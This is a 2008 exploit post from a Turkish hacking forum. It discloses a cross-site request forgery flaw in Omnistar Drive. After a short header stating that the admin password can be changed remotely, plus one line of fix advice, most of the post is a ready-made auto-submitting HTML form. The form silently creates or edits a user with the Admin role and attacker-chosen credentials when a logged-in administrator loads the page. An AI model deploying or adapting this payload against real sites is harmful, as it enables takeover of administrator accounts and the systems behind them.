ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> Omnistar Drive ~ XSRF Vuln.
Omnistar Drive ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers
Date :
14.11.2008 04:40:54
#
Omnistar Drive ~ XSRF Vuln.
[Full Screen Display]
< ------------------- header data start ------------------- > ############################################################# # Application Name : Omnistar Drive # Vulnerable Type : XSRF # Infection : Uzaktan otomatik olarak admin pass change edilebilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. # author : Bug Researchers ############################################################# < ------------------- header data end of ------------------- > <b0dy onLoad=Submit();> <script>function Submit[]{document.ButterflyEffect.submit();}</script> <form action=http://www.site.com/index.php?area=main&interface=users&sort_by=1&sort_order=ASC&page=1&return_to=@list&act=edit# method=post name=ButterflyEffect> <input type=hidden name=id value=> <input type=hidden name=username id=username value=ButterflyEffect size=20 maxlength=30 class=input > <input type=hidden name=password id=password value=ButterflyEffect size=20 maxlength=30 class=input> <input type=hidden name=confirm id=confirm value=ButterflyEffect size=20 maxlength=30 class=input> <input type=hidden name=first_name id=first_name value=ButterflyEffect size=20 maxlength=30 class=input> <input type=hidden name=last_name id=last_name value=ButterflyEffect size=20 maxlength=30 class=input> <input type=hidden name=email id=email value=Bl@ButterflyEffect.com size=30 maxlength=255 class=input> <select name=role id=role onChange=changeUserType(this); ><option value=Admin ></option> <input type=hidden name=can_add value=checkin id=can_add_checkin> <input type=hidden name=can_add_folders value=1 id=can_add_folders> <input type=hidden name=must_be_reviewed value=1 id=must_be_reviewed> <input type=hidden name=can_change_password value=1 checked id=can_change_password> <input type=hidden name=can_mail_selected value=1 checked id=can_mail_selected> <input type=hidden name=send_expired_email value=1 id=send_expired_email> <input type=image src= a target=_blank href=http://img56.imageshack.us/img56/6712/kaydetr7c26ki8.gif>http://img56.imageshack.us/img56/6712/kaydetr7c26ki8.gif> < -- bug code end of -- >
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©
